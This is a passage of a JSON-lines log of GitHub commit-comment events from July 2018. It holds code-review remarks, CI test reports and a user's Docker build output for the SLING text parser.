patch combo needs SPRT[0,6], three functional patch combo needs SPRT[0,7] and so one."}},"created_at":"2018-07-03T23:09:59Z"}
{"id":"7915429254","type":"CommitCommentEvent","actor":{"login":"anthonyromero"},"repo":{"name":"anthonyromero/PruebaOficial"},"payload":{"comment":{"id":29588110,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-03T23:10:34Z","updated_at":"2018-07-03T23:10:34Z","author_association":"OWNER","body":"## Joker es mi favorito"}},"created_at":"2018-07-03T23:10:34Z"}
{"id":"7915430542","type":"CommitCommentEvent","actor":{"login":"anthonyromero"},"repo":{"name":"anthonyromero/PruebaOficial"},"payload":{"comment":{"id":29588114,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-03T23:11:04Z","updated_at":"2018-07-03T23:11:04Z","author_association":"OWNER","body":"Entiendo porque agregaste a deadshor"}},"created_at":"2018-07-03T23:11:04Z"}
{"id":"7915431722","type":"CommitCommentEvent","actor":{"login":"jpcima"},"repo":{"name":"Wohlstand/libADLMIDI"},"payload":{"comment":{"id":29588116,"position":36,"line":356,"path":"include/adlmidi.h","commit_id":"9c8d04d885946342d0ffd233418e7862b6ca990c","created_at":"2018-07-03T23:11:31Z","updated_at":"2018-07-03T23:11:31Z","author_association":"CONTRIBUTOR","body":"The word \"logarithmic\" has been miswritten here."}},"created_at":"2018-07-03T23:11:31Z"}
{"id":"7915433127","type":"CommitCommentEvent","actor":{"login":"ZirconiumX"},"repo":{"name":"MoochMcGee/Emotionless"},"payload":{"comment":{"id":29588120,"position":64,"line":171,"path":"src/scph10000.cpp","commit_id":"0f8537236ac5477ed4da2ea71c012f59b0a022c5","created_at":"2018-07-03T23:12:06Z","updated_at":"2018-07-03T23:12:06Z","author_association":"NONE","body":"I don't think these are semantically identical; the original code will wrap on a memory boundary, but the new code won't. Is that what the original hardware does?"}},"created_at":"2018-07-03T23:12:06Z"}
{"id":"7915435806","type":"CommitCommentEvent","actor":{"login":"jpcima"},"repo":{"name":"Wohlstand/libADLMIDI"},"payload":{"comment":{"id":29588122,"position":78,"line":394,"path":"include/adlmidi.h","commit_id":"9c8d04d885946342d0ffd233418e7862b6ca990c","created_at":"2018-07-03T23:13:08Z","updated_at":"2018-07-03T23:13:08Z","author_association":"CONTRIBUTOR","body":"It can use the \"deprecated\" compiler attributes.\r\nhttps://stackoverflow.com/questions/295120/c-mark-as-deprecated"}},"created_at":"2018-07-03T23:13:08Z"}
{"id":"7915437010","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29588125,"position":null,"line":null,"path":null,"commit_id":"8a3a30d0543074adc1680a107328a1d26ef4ac10","created_at":"2018-07-03T23:13:36Z","updated_at":"2018-07-03T23:13:36Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/59/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/59//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/8a3a30d0543074adc1680a107328a1d26ef4ac10/59/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/8a3a30d0543074adc1680a107328a1d26ef4ac10/59/jenkins-results/apicomparison/index.html) (🔥 breaking changes 🔥)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/8a3a30d0543074adc1680a107328a1d26ef4ac10/59/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/8a3a30d0543074adc1680a107328a1d26ef4ac10/59/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n10 tests failed, 151 tests passed.\n\n## Failed tests\n\n * monotouch-test/iOS Unified 32-bits - simulator/Debug: TimedOut\n * introspection/iOS Unified 32-bits - simulator/Debug: TimedOut\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (static registrar): TimedOut\n * monotouch-test/iOS Unified 32-bits - simulator/Release (all optimizations): TimedOut\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (all optimizations): TimedOut\n * monotouch-test/iOS Unified 64-bits - simulator/Debug: TimedOut\n * introspection/iOS Unified 64-bits - simulator/Debug: TimedOut\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (static registrar): TimedOut\n * monotouch-test/iOS Unified 64-bits - simulator/Release (all optimizations): TimedOut\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (all optimizations): TimedOut\n"}},"created_at":"2018-07-03T23:13:36Z"}
{"id":"7915443547","type":"CommitCommentEvent","actor":{"login":"rsm-gh"},"repo":{"name":"rsm-gh/akbl"},"payload":{"comment":{"id":29588138,"position":null,"line":null,"path":null,"commit_id":"440f323ea10f069713847436341dcdd1280941e9","created_at":"2018-07-03T23:16:05Z","updated_at":"2018-07-03T23:16:05Z","author_association":"OWNER","body":"@heersaak thanks for remarking it ! I just made a proper correction by adding it to the `Paths()` class. And I probably take a deeper look to this because I don't see why I still needing to `os.chdir()`. In my computer it works even by doing a wrong `cd`.\r\n\r\nIf you have any more detailed info about your problem it would be helpful !\r\n\r\nRegards,\r\nrsm\r\n\r\n"}},"created_at":"2018-07-03T23:16:05Z"}
{"id":"7915446246","type":"CommitCommentEvent","actor":{"login":"theKashey"},"repo":{"name":"theKashey/beautiful-react-redux"},"payload":{"comment":{"id":29588141,"position":10,"line":7,"path":"src/patch.js","commit_id":"c8617322ae2af596147207036c503a50dfbd132b","created_at":"2018-07-03T23:17:05Z","updated_at":"2018-07-03T23:17:05Z","author_association":"OWNER","body":"Is it not working, or __breaking__ the build?\r\nTry to use `index`, not `patch`, and then you might _patch_ everything by your own."}},"created_at":"2018-07-03T23:17:05Z"}
{"id":"7915458091","type":"CommitCommentEvent","actor":{"login":"domoritz"},"repo":{"name":"vega/vega-lite"},"payload":{"comment":{"id":29588160,"position":null,"line":null,"path":null,"commit_id":"fe1ff4f26615641fbf8dad6a9b353f566c6f75f1","created_at":"2018-07-03T23:21:41Z","updated_at":"2018-07-03T23:21:41Z","author_association":"MEMBER","body":"This breaks the editor right now :-(\r\n"}},"created_at":"2018-07-03T23:21:41Z"}
{"id":"7915460059","type":"CommitCommentEvent","actor":{"login":"jpcima"},"repo":{"name":"Wohlstand/libADLMIDI"},"payload":{"comment":{"id":29588163,"position":159,"line":504,"path":"include/adlmidi.h","commit_id":"9c8d04d885946342d0ffd233418e7862b6ca990c","created_at":"2018-07-03T23:22:25Z","updated_at":"2018-07-03T23:22:25Z","author_association":"CONTRIBUTOR","body":"Typo here, the word is thread-\"safe\" instead of \"save\""}},"created_at":"2018-07-03T23:22:25Z"}
{"id":"7915460934","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29588164,"position":null,"line":null,"path":null,"commit_id":"06a38441cc54cd8af53f98669d3972273b10c7b2","created_at":"2018-07-03T23:22:46Z","updated_at":"2018-07-03T23:22:46Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-34](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-34).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-34-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-03T23:22:46Z"}
{"id":"7915475457","type":"CommitCommentEvent","actor":{"login":"jpcima"},"repo":{"name":"Wohlstand/libADLMIDI"},"payload":{"comment":{"id":29588199,"position":9,"line":63,"path":"include/adlmidi.h","commit_id":"e6d67761951b7d0c61adba0a3420379c04864ff3","created_at":"2018-07-03T23:28:29Z","updated_at":"2018-07-03T23:28:29Z","author_association":"CONTRIBUTOR","body":"This should be \"Automatic\" not \"Automatical\"."}},"created_at":"2018-07-03T23:28:29Z"}
{"id":"7915478275","type":"CommitCommentEvent","actor":{"login":"jpcima"},"repo":{"name":"Wohlstand/libADLMIDI"},"payload":{"comment":{"id":29588206,"position":94,"line":134,"path":"include/adlmidi.h","commit_id":"e6d67761951b7d0c61adba0a3420379c04864ff3","created_at":"2018-07-03T23:29:33Z","updated_at":"2018-07-03T23:29:33Z","author_association":"CONTRIBUTOR","body":"> exchanges polyphony limits\r\n\r\ndo you mean: \"extends polyphony limits\"?"}},"created_at":"2018-07-03T23:29:33Z"}
{"id":"7915479836","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"Wohlstand/libADLMIDI"},"payload":{"comment":{"id":29588209,"position":156,"line":337,"path":"include/adlmidi.h","commit_id":"35ed7d8b215fee6d08d8d411bd2d1ce2a3c68f71","created_at":"2018-07-03T23:30:10Z","updated_at":"2018-07-03T23:30:10Z","author_association":"OWNER","body":"Yes!\r\nSorry, I just wrote a nonsense :yum: "}},"created_at":"2018-07-03T23:30:10Z"}
{"id":"7915483083","type":"CommitCommentEvent","actor":{"login":"TheNoobCompany"},"repo":{"name":"TheNoobCompany/MarcIsHavingFunWithAlgorithmsInCSharp"},"payload":{"comment":{"id":29588213,"position":80,"line":80,"path":"Algorithms.Test/Searching.Test.cs","commit_id":"012c550f0a51470e597f4e7176b298f0f468e657","created_at":"2018-07-03T23:31:22Z","updated_at":"2018-07-03T23:31:22Z","author_association":"OWNER","body":"to remove"}},"created_at":"2018-07-03T23:31:22Z"}
{"id":"7915483443","type":"CommitCommentEvent","actor":{"login":"jpcima"},"repo":{"name":"Wohlstand/libADLMIDI"},"payload":{"comment":{"id":29588214,"position":130,"line":166,"path":"include/adlmidi.h","commit_id":"e6d67761951b7d0c61adba0a3420379c04864ff3","created_at":"2018-07-03T23:31:29Z","updated_at":"2018-07-03T23:31:29Z","author_association":"CONTRIBUTOR","body":"It's definitely wrong to write \"are\" in the sentence. I propose a rewrite:\r\n\"Array of strings containing the name of every embedded bank\""}},"created_at":"2018-07-03T23:31:29Z"}
{"id":"7915485643","type":"CommitCommentEvent","actor":{"login":"TheNoobCompany"},"repo":{"name":"TheNoobCompany/MarcIsHavingFunWithAlgorithmsInCSharp"},"payload":{"comment":{"id":29588220,"position":85,"line":85,"path":"Algorithms.Test/Searching.Test.cs","commit_id":"012c550f0a51470e597f4e7176b298f0f468e657","created_at":"2018-07-03T23:32:17Z","updated_at":"2018-07-03T23:32:17Z","author_association":"OWNER","body":"TODO: Implement bidirectionnal searching.\r\nWe could simply compare first and last entry of the list if \"assumed sorted\" and change the behavior dynamically."}},"created_at":"2018-07-03T23:32:17Z"}
{"id":"7915488958","type":"CommitCommentEvent","actor":{"login":"TheNoobCompany"},"repo":{"name":"TheNoobCompany/MarcIsHavingFunWithAlgorithmsInCSharp"},"payload":{"comment":{"id":29588228,"position":15,"line":15,"path":"Algorithms/Algorithms.cs","commit_id":"012c550f0a51470e597f4e7176b298f0f468e657","created_at":"2018-07-03T23:33:31Z","updated_at":"2018-07-03T23:33:31Z","author_association":"OWNER","body":"The content in Main doesn't really matter as it's just a proof of concept of the algorithms working.\r\nThe UnitTests asserts that already but it's always fine to have a quick visual."}},"created_at":"2018-07-03T23:33:31Z"}
{"id":"7915489918","type":"CommitCommentEvent","actor":{"login":"ajharahmed"},"repo":{"name":"wix/react-native-navigation"},"payload":{"comment":{"id":29588242,"position":18,"line":194,"path":"docs/docs/Installing.md","commit_id":"44cb1a1a7f6c1315376a6c20e4f42a7572200c11","created_at":"2018-07-03T23:33:50Z","updated_at":"2018-07-03T23:33:50Z","author_association":"NONE","body":"Please fix this for me "}},"created_at":"2018-07-03T23:33:50Z"}
{"id":"7915490093","type":"CommitCommentEvent","actor":{"login":"TheNoobCompany"},"repo":{"name":"TheNoobCompany/MarcIsHavingFunWithAlgorithmsInCSharp"},"payload":{"comment":{"id":29588244,"position":7,"line":7,"path":"Algorithms/Properties/AssemblyInfo.cs","commit_id":"012c550f0a51470e597f4e7176b298f0f468e657","created_at":"2018-07-03T23:33:54Z","updated_at":"2018-07-03T23:33:54Z","author_association":"OWNER","body":"to update to Algorithms from ConsoleApp5"}},"created_at":"2018-07-03T23:33:54Z"}
{"id":"7915498687","type":"CommitCommentEvent","actor":{"login":"Trim21"},"repo":{"name":"BGmi/BGmi"},"payload":{"comment":{"id":29588251,"position":16,"line":73,"path":"bgmi/lib/models.py","commit_id":"22d761e237638d116bfd94e70aa9624adebf1528","created_at":"2018-07-03T23:37:12Z","updated_at":"2018-07-03T23:37:12Z","author_association":"MEMBER","body":"先select出来，然后Bangmu.update.where(bangumi.name.not_in())…"}},"created_at":"2018-07-03T23:37:12Z"}
{"id":"7915498871","type":"CommitCommentEvent","actor":{"login":"Sliim"},"repo":{"name":"Sliim/pentest-env"},"payload":{"comment":{"id":29588252,"position":null,"line":null,"path":null,"commit_id":"3c544e7a2ce40c9e2d03d9851a88a0d1902788e9","created_at":"2018-07-03T23:37:16Z","updated_at":"2018-07-03T23:37:16Z","author_association":"OWNER","body":"Broke https://github.com/Sliim/pentest-env/issues/45"}},"created_at":"2018-07-03T23:37:16Z"}
{"id":"7915509154","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29588269,"position":null,"line":null,"path":null,"commit_id":"407962e55224e19958b6411943b35cec8a888b4a","created_at":"2018-07-03T23:41:18Z","updated_at":"2018-07-03T23:41:18Z","author_association":"NONE","body":"3982683-EIRFormulatedWWHP (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2931 of 2934 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: BND diffs.\n * 2 tests had: MDD diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\nregression Test Summary\n * Passed: 622\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-03T23:41:18Z"}
{"id":"7915513635","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29588280,"position":null,"line":null,"path":null,"commit_id":"407962e55224e19958b6411943b35cec8a888b4a","created_at":"2018-07-03T23:43:11Z","updated_at":"2018-07-03T23:43:11Z","author_association":"NONE","body":"3982683-EIRFormulatedWWHP (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2974 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: BND diffs.\n * 2 tests had: MDD diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 628\n * Failed: 1\n\nregression Test Summary\n * Passed: 642\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-03T23:43:11Z"}
{"id":"7915513994","type":"CommitCommentEvent","actor":{"login":"johndpope"},"repo":{"name":"IndicoDataSolutions/finetune"},"payload":{"comment":{"id":29588281,"position":14,"line":9,"path":"README.md","commit_id":"166f8be6fea9f5076e7d17c0cac50aeaa7fc316d","created_at":"2018-07-03T23:43:20Z","updated_at":"2018-07-03T23:43:20Z","author_association":"NONE","body":"hi - sorry to post here - there's no issues in this repo (maybe that's something you can enable?)- but I have some feedback specific to this codebase/readme. \r\non the - you have LanguageModelClassifier this takes an x /y input. \r\n \r\n\r\nI wonder if you could spoon feed a hello world example for beginners.\r\n\r\neg. \r\n```python\r\n\r\n\r\nimport sling\r\n\r\nparser = sling.Parser(\"sempar.flow\")\r\n\r\ntext = raw_input(\"text: \")\r\ndoc = parser.parse(text)\r\nprint doc.frame.data(pretty=True)\r\nfor m in doc.mentions:\r\n  print \"mention\", doc.phrase(m.begin, m.end)\r\n```\r\n\r\nthis repo contains a docker file that fires up and runs the code. \r\nhttps://github.com/sih4sing5hong5/sling_trying_out/blob/df3604419a6849dba1df2a6b8779a9eef1799bdf/trying_out.py\r\n\r\n**docker build .**\r\n\r\n```shell\r\nSending build context to Docker daemon 37.98 MB\r\nStep 1 : FROM ubuntu:16.04\r\n ---> 5e8b97a2a082\r\nStep 2 : MAINTAINER sih4sing5hong5\r\n ---> Using cache\r\n ---> d92181c53f70\r\nStep 3 : RUN apt-get update # 0529\r\n ---> Using cache\r\n ---> c9bdcbb20882\r\nStep 4 : RUN apt-get install -y python python-pip wget\r\n ---> Using cache\r\n ---> d658546ad0e9\r\nStep 5 : RUN pip install --upgrade pip\r\n ---> Using cache\r\n ---> 93a352b0c9b1\r\nStep 6 : RUN pip install http://www.jbox.dk/sling/sling-1.0.0-cp27-none-linux_x86_64.whl\r\n ---> Using cache\r\n ---> a8794c64ac92\r\nStep 7 : RUN mkdir /usr/local/sling\r\n ---> Using cache\r\n ---> 8360aa993e12\r\nStep 8 : WORKDIR /usr/local/sling\r\n ---> Using cache\r\n ---> e3f6340268da\r\nStep 9 : COPY sempar.flow sempar.flow\r\n ---> 5f5ef7e02ff1\r\nRemoving intermediate container 0f8b84eba327\r\nStep 10 : COPY trying_out.py trying_out.py\r\n ---> 68d8b1f5da60\r\nRemoving intermediate container 81ab28504570\r\nStep 11 : RUN echo SLING is a parser for annotating text with frame semantic annotations. | python trying_out.py\r\n ---> Running in 205c6d7ce0a1\r\ntext: {=#1\r\n  :/s/document\r\n  /s/document/text: \"SLING is a parser for annotating text with frame semantic annotations.\"\r\n  /s/document/tokens: [{=#2\r\n    :/s/token\r\n    /s/token/index: 0\r\n    /s/token/text: \"SLING\"\r\n    /s/token/start: 0\r\n    /s/token/length: 5\r\n    /s/token/break: 0\r\n  }, {=#3\r\n    :/s/token\r\n    /s/token/index: 1\r\n    /s/token/text: \"is\"\r\n    /s/token/start: 6\r\n    /s/token/length: 2\r\n  }, {=#4\r\n    :/s/token\r\n    /s/token/index: 2\r\n    /s/token/text: \"a\"\r\n    /s/token/start: 9\r\n    /s/token/length: 1\r\n  }, {=#5\r\n    :/s/token\r\n    /s/token/index: 3\r\n    /s/token/text: \"parser\"\r\n    /s/token/start: 11\r\n    /s/token/length: 6\r\n  }, {=#6\r\n    :/s/token\r\n    /s/token/index: 4\r\n    /s/token/text: \"for\"\r\n    /s/token/start: 18\r\n    /s/token/length: 3\r\n  }, {=#7\r\n    :/s/token\r\n    /s/token/index: 5\r\n    /s/token/text: \"annotating\"\r\n    /s/token/start: 22\r\n    /s/token/length: 10\r\n  }, {=#8\r\n    :/s/token\r\n    /s/token/index: 6\r\n    /s/token/text: \"text\"\r\n    /s/token/start: 33\r\n    /s/token/length: 4\r\n  }, {=#9\r\n    :/s/token\r\n    /s/token/index: 7\r\n    /s/token/text: \"with\"\r\n    /s/token/start: 38\r\n    /s/token/length: 4\r\n  }, {=#10\r\n    :/s/token\r\n    /s/token/index: 8\r\n    /s/token/text: \"frame\"\r\n    /s/token/start: 43\r\n    /s/token/length: 5\r\n  }, {=#11\r\n    :/s/token\r\n    /s/token/index: 9\r\n    /s/token/text: \"semantic\"\r\n    /s/token/start: 49\r\n    /s/token/length: 8\r\n  }, {=#12\r\n    :/s/token\r\n    /s/token/index: 10\r\n    /s/token/text: \"annotations\"\r\n    /s/token/start: 58\r\n    /s/token/length: 11\r\n  }, {=#13\r\n    :/s/token\r\n    /s/token/index: 11\r\n    /s/token/text: \".\"\r\n    /s/token/start: 69\r\n    /s/token/length: 1\r\n    /s/token/break: 0\r\n  }]\r\n  /s/document/mention: {=#14\r\n    :/s/phrase\r\n    /s/phrase/begin: 0\r\n    /s/phrase/evokes: {=#15\r\n      :/saft/other\r\n    }\r\n  }\r\n  /s/document/mention: {=#16\r\n    :/s/phrase\r\n    /s/phrase/begin: 1\r\n    /s/phrase/evokes: {=#17\r\n      :/pb/be-01\r\n      /pb/arg1: #15\r\n      /pb/arg2: {=#18\r\n        :/saft/other\r\n      }\r\n    }\r\n  }\r\n  /s/document/mention: {=#19\r\n    :/s/phrase\r\n    /s/phrase/begin: 3\r\n    /s/phrase/evokes: #18\r\n  }\r\n  /s/document/mention: {=#20\r\n    :/s/phrase\r\n    /s/phrase/begin: 6\r\n    /s/phrase/evokes: {=#21\r\n      :/saft/art\r\n    }\r\n  }\r\n  /s/document/mention: {=#22\r\n    :/s/phrase\r\n    /s/phrase/begin: 8\r\n    /s/phrase/length: 3\r\n    /s/phrase/evokes: {=#23\r\n      :/saft/other\r\n    }\r\n  }\r\n}\r\nmention SLING\r\nmention is\r\nmention parser\r\nmention text\r\nmention frame semantic annotations\r\n ---> aa87077a3aeb\r\nRemoving intermediate container 205c6d7ce0a1\r\nSuccessfully built aa87077a3aeb\r\n```"}},"created_at":"2018-07-03T23:43:20Z"}
{"id":"7915516601","type":"CommitCommentEvent","actor":{"login":"johndpope"},"repo":{"name":"IndicoDataSolutions/finetune"},"payload":{"comment":{"id":29588288,"position":53,"line":41,"path":"README.md","commit_id":"166f8be6fea9f5076e7d17c0cac50aeaa7fc316d","created_at":"2018-07-03T23:44:24Z","updated_at":"2018-07-03T23:44:24Z","author_association":"NONE","body":"can you spell out trainX? how to initialise - is there some out of the box dataset you could plugin for demonstration purposes? "}},"created_at":"2018-07-03T23:44:24Z"}
{"id":"7915517037","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29588291,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-03T23:44:34Z","updated_at":"2018-07-03T23:44:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T23:44:34Z"}
{"id":"7915519376","type":"CommitCommentEvent","actor":{"login":"TiagoFernandesDaCosta"},"repo":{"name":"TiagoFernandesDaCosta/curso-azdev"},"payload":{"comment":{"id":29588301,"position":null,"line":null,"path":null,"commit_id":"7743a189f7ce3f42e175773db391942af105242b","created_at":"2018-07-03T23:45:32Z","updated_at":"2018-07-03T23:45:32Z","author_association":"OWNER","body":"commit curso dia 2"}},"created_at":"2018-07-03T23:45:32Z"}
{"id":"7915525713","type":"CommitCommentEvent","actor":{"login":"waldyrious"},"repo":{"name":"lukasz-madon/awesome-remote-job"},"payload":{"comment":{"id":29588312,"position":null,"line":null,"path":null,"commit_id":"880630b519b0988d49234898eb27a03f03785eca","created_at":"2018-07-03T23:47:58Z","updated_at":"2018-07-03T23:47:58Z","author_association":"COLLABORATOR","body":"Note: this is a follow-up of #450."}},"created_at":"2018-07-03T23:47:58Z"}
{"id":"7915525857","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29588313,"position":null,"line":null,"path":null,"commit_id":"407962e55224e19958b6411943b35cec8a888b4a","created_at":"2018-07-03T23:48:01Z","updated_at":"2018-07-03T23:48:01Z","author_association":"NONE","body":"3982683-EIRFormulatedWWHP (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-03T23:48:01Z"}
{"id":"7915539198","type":"CommitCommentEvent","actor":{"login":"cwuethrich"},"repo":{"name":"hvanbakel/CsprojToVs2017"},"payload":{"comment":{"id":29588338,"position":26,"line":26,"path":"Project2015To2017.Console/Options.cs","commit_id":"93427f971f5b80616e8784535340fd2fe1078c90","created_at":"2018-07-03T23:53:28Z","updated_at":"2018-07-03T23:53:28Z","author_association":"NONE","body":"This is just a class with the command line options. So this has nothing to do with the transformation.\r\n\r\n@mungojam do you agree?"}},"created_at":"2018-07-03T23:53:28Z"}
{"id":"7915541581","type":"CommitCommentEvent","actor":{"login":"rama64"},"repo":{"name":"fedegon/CapacitacionInicialGrupo4"},"payload":{"comment":{"id":29588342,"position":null,"line":null,"path":null,"commit_id":"b07ff13359403d953052d2df0894a6bdb04517e5","created_at":"2018-07-03T23:54:22Z","updated_at":"2018-07-03T23:54:22Z","author_association":"COLLABORATOR","body":"1) Super valorable el laburo, se nota que le pusieron ganas.\r\n2) @DisplayName es para poner un nombre descriptivo si el nombre del método no alcanza. Para explicar bien y describir qué se hace, qué se espera, etc se documenta en java doc común por ej con un comentario de líneas múltiples.\r\n3) Restaurant resto=new Restaurant(\"resto_test\"); se usa en varios tests de estos, podrían ponerlo en el before\r\n4) Ojo! que inicializan todo cada vez al usar el @BeforeEach. En el caso del user tiene sentido porque así \"limpian\" la instancia entre tests. Pero hay casos en los que podría ser trabajo  sea innecesario. Tengan cuidado, nada más :) \r\n5) Qué tipo de tests son? porque por el nombre imagino una cosa pero el código me indica otra \r\n6) Si pueden armar carpetas mínimamente diferenciando el tipo de test (integración, unidad etc) los ayudaría. \r\n7) testRecommendRestaurant no \"testea profundamente el caso\". Me explico acá solo se fija la cantidad... y si hay un bug externo que siempre lo pone en uno? podríamos testear varias cantidades distintas? podrían verificar que los valores que realmente se almacenan/cambian son los esperados? etc. Tengan cuidado porque es el error más común je :P \r\nSi no nos queda un \"test\" que creemos que prueba todo y es seguro pero si solo prueba \"casos felices\" y por arriba... mmm cuando realmente haya algo mal no lo vamos a poder detectar como deberíamos por ser \"light\" con los tests. Piensen que es una forma de darle calidad al código así que sin miedo! háganlo de goma! \r\n8) Mismo que punto 7 para testRecommendRestaurantAllFriends. Ojo con esos espacios por favor... \r\n9) No entiendo el sentido del test testSearchFriend. Creo que el nombre no se condice del todo o simplemente le pasa lo del punto 7. \r\n10) Recuerden que pueden hacer jerarquías de tests, que pueden llamar métodos privados internos de la clase, etc ;) \r\n11) Si van a testar al usuario pueden hacer muchas cosas, pero van por buen camino. Sigan así! :D \r\nasí se aprende, haciendo ;) \r\n"}},"created_at":"2018-07-03T23:54:22Z"}
{"id":"7909969208","type":"CommitCommentEvent","actor":{"login":"nguyenhoangtran11"},"repo":{"name":"216k155/lux"},"payload":{"comment":{"id":29574697,"position":null,"line":null,"path":null,"commit_id":"f3476d50d2171250ba7c22951af5efff23b490de","created_at":"2018-07-03T03:00:43Z","updated_at":"2018-07-03T03:00:43Z","author_association":"COLLABORATOR","body":"Please move CMerkleBlock processing to another commit. We should have \"one commit per one purpose\" for easy debug later\r\nThis QT change is just to improve the code readability only. It doesn't fix anything related to the hang"}},"created_at":"2018-07-03T03:00:43Z"}
{"id":"7909985972","type":"CommitCommentEvent","actor":{"login":"pct960"},"repo":{"name":"rbccps-iisc/ideam"},"payload":{"comment":{"id":29574724,"position":null,"line":null,"path":null,"commit_id":"57108892ed4719bd9daecbde9e858f6b26927fdb","created_at":"2018-07-03T03:06:48Z","updated_at":"2018-07-03T03:06:48Z","author_association":"MEMBER","body":"An entity that wants to issue a follow request cannot publish to the owner's exchange. Therefore, the publish is made using the admin API of rabbitmq"}},"created_at":"2018-07-03T03:06:48Z"}
{"id":"7909987642","type":"CommitCommentEvent","actor":{"login":"schaumb"},"repo":{"name":"j4ts/j4ts-awt-swing"},"payload":{"comment":{"id":29574726,"position":86,"line":198,"path":"src/main/java/javax/swing/JTextArea.java","commit_id":"4e1718aef34fed98c8fbfcd9ccb483c10536a754","created_at":"2018-07-03T03:07:31Z","updated_at":"2018-07-03T03:07:31Z","author_association":"COLLABORATOR","body":"!!!!!!! "}},"created_at":"2018-07-03T03:07:31Z"}
